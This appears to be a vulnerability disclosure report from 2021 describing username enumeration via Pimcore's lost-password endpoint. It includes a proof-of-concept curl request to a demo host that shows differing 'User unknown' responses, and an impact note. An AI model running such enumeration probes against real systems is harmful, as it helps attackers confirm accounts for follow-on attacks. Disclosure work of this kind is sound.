Observable Response Discrepancy in pimcore/pimcore
Reported on
Aug 31st 2021
✍️ Description
It is possible to enumerate usernames via the forgot password functionality: the lost-password endpoint answers differently depending on whether the submitted username exists.
🕵️♂️ Proof of Concept
When entering a username that is not registered in the application, the response reads "User unknown", whereas a registered username produces a different response. The following curl command demonstrates this:
curl -i -s -k -X $'POST' \
-H $'Host: demo.pimcore.fun' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://demo.pimcore.fun/admin/login/lostpassword' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 82' -H $'Origin: https://demo.pimcore.fun' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Te: trailers' -H $'Connection: close' \
-b $'PHPSESSID=6f1c18e8cc8503830b327897c8fb8678' \
--data-binary $'username=RandomUsername&csrfToken=a1b983212b46f65236f802e94253af4dc2d6320e&submit=' \
$'https://demo.pimcore.fun/admin/login/lostpassword'
💥 Impact
It is possible to enumerate usernames of registered users in the application. An attacker can then use the confirmed usernames in further attacks against those accounts.